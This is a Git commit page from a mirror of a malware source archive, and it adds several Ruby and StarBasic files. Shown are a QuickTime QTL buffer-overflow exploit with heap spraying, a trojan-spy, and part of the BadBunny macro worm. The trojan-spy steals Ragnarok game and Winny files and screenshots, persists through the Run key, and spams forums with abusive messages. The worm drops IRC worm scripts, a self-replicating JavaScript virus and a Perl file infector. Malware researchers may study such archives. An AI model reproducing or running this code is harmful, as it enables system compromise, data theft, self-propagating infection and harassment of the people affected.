daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 08:19:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2020-10-09 22:09:52 -05:00
committed by GitHub
parent f5ec68af9b
commit 9cbdb38457
17 changed files with 2998 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Ruby/Constructor.Ruby.Qtp.a
+61
View File
@@ -0,0 +1,61 @@
#!/usr/bin/ruby
# Copyright (c) LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as a cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html
# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING = "/usr/bin/say Happy new year shit bag"
# Mac OS X 10.4.8 (8L2127)
EBP_ADDR = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR = 0x916c24bc # /usr/bin/curl
SHELL_ADDR = 0x918bef3a # /bin/sh
CMDSTR_ADDR = [
SHELL_ADDR, # 0 addr to static /bin/sh (lame)
0x017a053c, # 1 addr to our command string (cool) :> (change as necessary)
0xbabeface, # 2 bogus addr for testing.
CURL_ADDR # 3 addr to '/usr/bin/curl'
]
# Payload. default to CMDSTR_ADDR 0 (/bin/sh)
HAPPY = ("A" * 299) +
[EBP_ADDR].pack("V") +
[SYSTEM_ADDR].pack("V") +
[SETUID_ADDR].pack("V") +
[CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR)
# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW = ("\x90" * 30000) + CMD_STRING # feed the heap
YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more
BOYZ = ("\x90" * 30000) + "FOOM" # and more
# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
"<?quicktime type=\"application/x-quicktime-media-link\"?>" +
"<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
"qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
"src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"
target_file = File.open("pwnage.qtl", "w+") { |f|
f.print(QTL_CONTENT)
f.close
}
Ruby/Trojan-Spy.Ruby.Kakkeys.d
+574
View File
@@ -0,0 +1,574 @@
$KCODE = 's'
#$DEBUG = true
#Exerb = nil
require 'Win32API'
if ARGV.size == 1 and ARGV[0].include?('RoAddr')
$path = ARGV[0]
if File.exist?($path)
$rost = Win32API.new($path, 'RO_GetNowState', '', 'l')
$rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p')
$ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p')
$roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i')
$roin.call(0, '', 0x7FFFFFFF)
$rost.call
if $rost.call == 2
print $ropa.call(258).to_s + "[#{$rowld.call}]"
end
end
exit
end
require 'win32/registry'
require 'ftools'
def dll(file)
if !File.exist?('C:/windows/system32/' + file)
f = Exerb.open(file)
f.binmode
open('C:/windows/system32/' + file, 'w'){|f2|
f2.binmode
f.read 9
p f2.write(f.read)
}
f.close
end
end
if Exerb
if !Exerb.filepath.include?('iexplore')
File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe')
`start install.exe`
dll('zlib.dll')
dll('7-zip32.dll')
dll('imgctl.dll')
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
`start C:\\windows\\system32\\iexplore.exe`
exit
else
=begin
$double = Thread.new{
cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l')
rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l')
ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l')
om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l')
gle = Win32API.new('kernel32', 'GetLastError', '', 'l')
hage = cm.call(0, 0, 'hagemoe')
if gle.call == 183
ch.call hage
hage = nil
hagege = cm.call(0, 0, 'hagegemoe')
if gle.call == 183
ch.call hagege
exit 1
end
elsif
0
end
if hage
s = 'hagegemoe'
else
s = 'hagemoe'
end
while(1)
a = om.call(1, 0, s)
if a == 0
if ARGV[0] == 'aaa'
p system("start #{Exerb.filepath}")
else
p system("strat #{Exerb.filepath} aaa")
end
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
sleep 0.1
else
ch.call(a)
end
#p "sss"
sleep 0.04
end
}
=end
end
end
if ARGV[0] == 'aaa'
sleep
end
END {
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
}
require 'kconv'
require 'web/agent'
require 'web/linkextor'
$wait_time = 1
$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']]
$category = ''
$bbs = ''
$ropath = []
$korepath = []
$nypath = []
$toolpath = []
$charanames = []
$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe']
$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe']
$kakikomi = []
$id = ''
$charaarr = []
$charas = ''
$tekito_id = ''
def Dir.copy(from, to, *jogai)
begin
sleep 0.01
Dir.foreach(from){|x|
if !x.match(/^\.\.?/)
if File.directory?(from + x)
Dir.mkdir(to + x)
Dir.copy(from + x + '/', to + x + '/', *jogai)
else
if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0
File.copy(from + x, to + x)
end
end
end
}
rescue
return 1
end
0
end
def delete_dir(dir)
begin
Dir.foreach(dir){|x|
if !x.match(/^\.\.?/)
if File.directory?(dir + x)
if Dir.entries(dir + x).size <= 2
Dir.delete(dir + x)
else
delete_dir(dir + x + '/')
end
else
File.delete(dir + x)
end
end
}
Dir.delete(dir)
rescue
return 1
end
0
end
def roname
abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb
return nil if abx.size == 0
$charanames.push(abx) if !$charanames.include?(abx)
savedata($savefile)
abx
end
def emotion_wana wana
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key|
for i in 0..9
key.write_s(i.to_s, wana)
end
}
end
def upfolder(folder, trip)
Dir.mkdir(folder) if !File.exist?(folder)
begin
$nypath.each{|x|
File.chmod(0777, x + '/upfolder.txt')
open(x + '/UpFolder.txt', 'a+'){|f|
f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン')
}
}
rescue
end
folder
end
def saiki dir
sleep 0.01
begin
Dir.chdir(dir){
#print Dir.pwd + "\n"
$ropath.push Dir.pwd if File.exist?($tar[0])
$korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1])
sleep 0.01
$nypath.push Dir.pwd if File.exist?($tar[2])
$kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt')
$toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0
Dir.foreach('./'){ |x|
if File.directory?(x) && !x.match(/\.\.?/)
saiki(x)
end
}
}
rescue
p $!
ensure
end
end
def search
get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l')
for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('')
if get_drv_type.call(drive + ':/') == 3
saiki(drive + ':/')
end
end
$ropath.uniq!
$toolpath.uniq!
$korepath.uniq!
$nypath.uniq!
end
def savedata(path)
open(path, 'w'){|f|
Marshal.dump($ropath, f)
Marshal.dump($korepath, f)
Marshal.dump($nypath, f)
Marshal.dump($toolpath, f)
Marshal.dump($kakikomi, f)
Marshal.dump($bbs_arr, f)
Marshal.dump($charanames, f)
Marshal.dump($tekito_id, f)
}
true
end
def loaddata(path)
return false if !File.exists?(path)
open(path){|f|
$ropath = Marshal.load(f)
$korepath = Marshal.load(f)
$nypath = Marshal.load(f)
$toolpath = Marshal.load(f)
$kakikomi = Marshal.load(f)
$bbs_arr = Marshal.load(f)
$charanames = Marshal.load(f)
$tekito_id = Marshal.load(f)
}
true
end
def rns *str
if str.size == 1
str = str[0].split('')
end
str[rand(str.size)]
end
def names
begin
$charaarr = []
$charas = ''
separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words)
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list|
wisp_list.each_key{|server_str, sute|
$charas += server_str + "\n"
wisp_list.open(server_str){|server|
server.each_key{|char_str, sute|
$charaarr.push char_str.split("\0")[0]
}
}
$charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n"
$charaarr = []
}
}
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]}
rescue
p $1
end
end
names
$upup = upfolder('C:\program files\daemontools\\', '')
$capture = Proc.new{
loop do
getDC = Win32API.new('user32', 'GetDC', 'l', 'l')
releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l')
dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l')
dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i')
deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i')
begin
akakaka = roname
hdc = getDC.call(0)
hdib = dc2dib.call(hdc,0,0,0,0)
dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' '+$charanames.join('')+'.png', hdib, 0)
File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0)
ensure
deleteDib.call(hdib)
releaceDC.call(0, hdc)
end
if akakaka
jikan = Time.now
if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18
emotion_wana "やあ僕BOTer#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!"
sleep 5 * 60
else
sleep 12 * 60
end
else
begin
open('c:/program files/internet explorer/iexplore.exe', 'a'){}
sleep 20 * 60
rescue
sleep 15 * 60
end
end
end
}
#init
$savefile = 'C:/RECYCLER/explorer.sys'
if !loaddata($savefile)
Thread.new(&$capture)
search
savedata($savefile)
else
Thread.new(&$capture)
end
if $tekito_id.size == 0
$tekito_id = $id
end
#p $ropath, $korepath, $nypath, $toolpath, $charanames
if Dir.glob('C:/program files/daemontools/*.zip').size == 0
begin
tmpf = 'C:/RECYCLER/tmp/'
Dir.mkdir(tmpf) if !File.exist?(tmpf)
$toolpath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', 'txt')
}
$korepath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', 'fld')
}
$ropath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld')
}
$nypath.each_with_index{|x, i|
if i == 0
to = tmpf + 'winny'
else
to = tmpf + 'winny' + i.to_s
end
Dir.mkdir(to) if !File.exist?(to)
File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt')
File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt')
File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt')
}
$kakikomi.each{|x|
File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x)
}
seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i')
str = 'aaaaa'
seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5)
rescue
p $!
print $!.backtrace.join("\n")
ensure
delete_dir tmpf
end
end
#exit
$path = $ropath[0] + '/'
$roaddr = File.exist?($path + 'roaddr.dll')
$ro = File.exist?($path + 'ragexe.exe')
$are = File.exist?($path + 'ws2_32.dll')
$rtx = File.exist?($path + 'ddraw.dll')
def rtx
rns(rns('rRrR'), rns('あアア') + rns('-あアア') + rns('るルル')) +
rns(rns('tTtT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー-')) +
rns(rns('xXxX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス'))
end
def aretool
rns(rns('aAaA'), rns('あアア')) +
rns(rns('rRrR') + rns('eEeE'), rns('れレレ')) +
rns(rns('tTtT') + rns('oOoO0'), rns('つツツ')) +
rns(rns('oOoO0'), rns('うウウー-')) +
rns(rns('lLlL'), rns('るルル'))
end
$nypath.each{|x|
if File.exist?(x + '/Tab1.txt')
open(x + '/Tab1.txt'){|f|
$omosiro_words = f.read.split("\n")
}
end
}
def getThreads
http = Web::Agent.new
http.setup
http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
$category, $bbs = *$bbs_arr[rand($bbs_arr.size)]
http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt")
$suret = http.rsp.body.split("\n")
sss = []
$suret.each{|sure|
if !sure.match(/.*\(10000?\)/)
sure.match(/^(\d+)/)
sss.push $1
end
}
return sss;
end
#p '書き込み開始'
agent = Web::Agent.new
agent.setup
agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
agent.get('http://www.cybersyndrome.net/pla.html')
agent.rsp.body.match("")
proxy = []
while($'.match(/\"A\">([^<>]*)<\/a>/)) #'
proxy.push($~[1])
end
proxy.delete_if{|pr|
pr.match(/(80)|(8080)/)
}
proxy.collect! do |i|
i.split(':')
end
count = 0
while(1)
sure = getThreads;
if rand(6) == 0
for ituuu in 0..9
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
age.get 'http://yy14.kakiko.com/landstriker/subject.txt'
suret = age.rsp.body.split("\n")
sss = []
suret.each{|sure|
if !sure.match(/.*\(10000?\)/)
sure.match(/^(\d+)/)
sss.push $1
end
}
Thread.new{
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
age.req.header['content-type']='application/x-www-form-urlencoded'
ran = rand(proxy.size)
if rand(2) == 1
age.proxy_host = proxy[ran][0]
age.proxy_port = proxy[ran][1]
end
if sss.size != 0
if $id == ''
age.req.form.add 'FROM', (10000 + rand(90000)).to_s
age.req.form.add 'mail', 'sage'
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
else
names
age.req.form.add 'FROM', $id
age.req.form.add 'mail', ''
massage = ''
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
massage += rtx + "\n" if $rtx
massage += aretool + "\n" if $are
massage += "RoAddr\n" if $roaddr && rand(2) == 1
massage += "KORE\n" if $korepath.size > 0
massage += $charas
age.req.form.add 'MESSAGE', massage
end
age.req.form.add 'bbs', 'landstriker'
age.req.form.add 'key', sure[rand(sure.size)]
age.req.form.add 'time', Time.now.to_i.to_s
age.req.form.add 'submit', '書き込む'
age.post('http://yy14.kakiko.com/test.bbs.cgi')
else
suret[rand(suret.size)].match(/,(.+)\(/)
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
age.req.form.add 'FROM', ''
age.req.form.add 'mail', ''
age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
age.req.form.add 'bbs', $bbs
age.req.form.add 'time', Time.now.to_s.toi
age.req.form.add 'submit', '新規スレッド作成'
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
end
}
end
else
if sure.size != 0
loop do
sleep $wait_time
r = rand proxy.size
Thread.new(r, proxy){|ran, pro|
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
if rand(2) == 1
age.proxy_host = pro[ran][0]
age.proxy_port = pro[ran][1]
end
if $id == ''
age.req.form.add 'NAME', (10000 + rand(90000)).to_s
age.req.form.add 'MAIL', 'sage'
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
else
names
age.req.form.add 'NAME', $id.chop.chop
age.req.form.add 'MAIL', ''
massage = ''
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
massage += rtx + "\n" if $rtx
massage += aretool + "\n" if $are
massage += "RoAddr\n" if $roaddr && rand(2) == 1
massage += "KORE\n" if $korepath.size > 0
massage += $charas
age.req.form.add 'MESSAGE', massage
end
age.req.form.add 'BBS', $bbs
age.req.form.add 'KEY', sure[rand(sure.size)]
age.req.form.add 'TIME', Time.now.to_s.to_i
age.req.form.add 'DIR', $category
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
}
count += 1
break if count % 10 == 0
end
else
$suret[rand($suret.size)].match(/,(.+)\(/)
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
age.req.form.add 'NAME', ''
age.req.form.add 'MAIL', ''
age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
age.req.form.add 'BBS', $bbs
age.req.form.add 'TIME', Time.now.to_s.to_i
age.req.form.add 'DIR', $category
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
end
end
end
while Thread.list.size > 2
sleep 10
end
Ruby/Virus.Ruby.Badbunny.a
+314
View File
@@ -0,0 +1,314 @@
Dim Url As String
Dim myFileProp as Object
Sub badbunny()
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
mEventProps(0).Name = "EventType"
mEventProps(0).Value = "StarBasic"
mEventProps(1).Name = "Script"
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
oDocument = ThisComponent
otext=oDocument.text
ocursor=otext.createtextcursor()
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
call ping
end sub
sub startgame
if GetGUIType =1 then 'windows
call win
end if
if GetGUIType =3 then 'MacOS
call mac
end if
if GetGUIType =4 then 'linux
call lin
end if
end sub
sub win
Dim dirz As String
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="c:\badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
dirz=Environ ("programfiles")
Open "c:\drop.bad" For Output As #1
Print #1, "[script]"
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
Print #1, "n2=on 1:start:{"
Print #1, "n3= /if $day == Friday { /echo }"
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
Print #1, "n9=on 1:part:#:{"
Print #1, "n10=set %M_E $me"
Print #1, "n11=set %NickName $nick"
Print #1, "n12=set %ccd .dcc"
Print #1, "n13= if %NickName != %M_E {"
Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
Print #1, "n15= /msg %NickName Be my bunny!"
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
Print #1, "n17= }"
Print #1, "n18=}"
Close #1
if ( Dir(dirz &"\mirc") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
end if
if ( Dir("c:\mirc") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
end if
if ( Dir(dirz &"\mirc32") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
end if
if ( Dir("c:\mirc32") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
end if
Open "c:\badbunny.js" For Output As #2
Print #2, "// BadBunny"
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
Print #2, "var OurCode=me.Read(1759)"
Print #2, "me.Close()"
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
Print #2, "{"
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
Print #2, "var Marker=filez.Read(11)"
Print #2, "var allinone=Marker+filez.ReadAll()"
Print #2, "filez.Close()"
Print #2, "if(Marker!=""// BadBunny"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
Print #2, "filez.Write(OurCode+allinone)"
Print #2, "filez.Close()"
Print #2, "}"
Print #2, "}"
Print #2, "}"
Print #2, "function foundit()"
Print #2, "{"
Print #2, "fcodea=''; count=0; randon='';"
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
Print #2, "i+=fcodea.length;"
Print #2, "}"
Print #2, "//->"
Close #2
Shell("c:\badbunny.js",0)
oDoc.store()
End Sub
sub lin()
'xchat2worm part by WarGame
dim HomeDir as string
dim xchat2script as string
dim perlvir as string
dim cmd as string
dim WgeT as string
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="/tmp/badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
' get home dir
HomeDir = Environ("HOME")
'build the path of our xchat2 script
if HomeDir = "" then
' I could not get $HOME !
else
xchat2script = HomeDir & "/.xchat2/badbunny.py"
' drop the python script
Open xchat2script For Output As #1
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
print #1,"import xchat"
print #1,"def onkick_cb(word, word_eol, userdata):"
print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
print #1," return xchat.EAT_NONE"
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
close #1
endif
'drop the perl virus
perlvir = HomeDir & "/BadBunny.pl"
open perlvir for output as #1
print #1,"#BadBunny"
print #1,"open(File,$0);@MyCode = ;close(File);"
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
close #1
cmd = "perl " & perlvir
shell(cmd,0)
oDoc.store()
end sub
sub mac()
Dim iVar As Integer
iVar = Int((15 * Rnd) -2)
Select Case iVar
Case 1 To 5
call one
Case 6, 7, 8
call two
Case Is > 8 And iVar < 11
call one
Case Else
call two
End Select
end sub
sub one ()
'thx to skyout
Open "badbunny.rb" For Output As #1
print #1,"#!/usr/bin/env ruby"
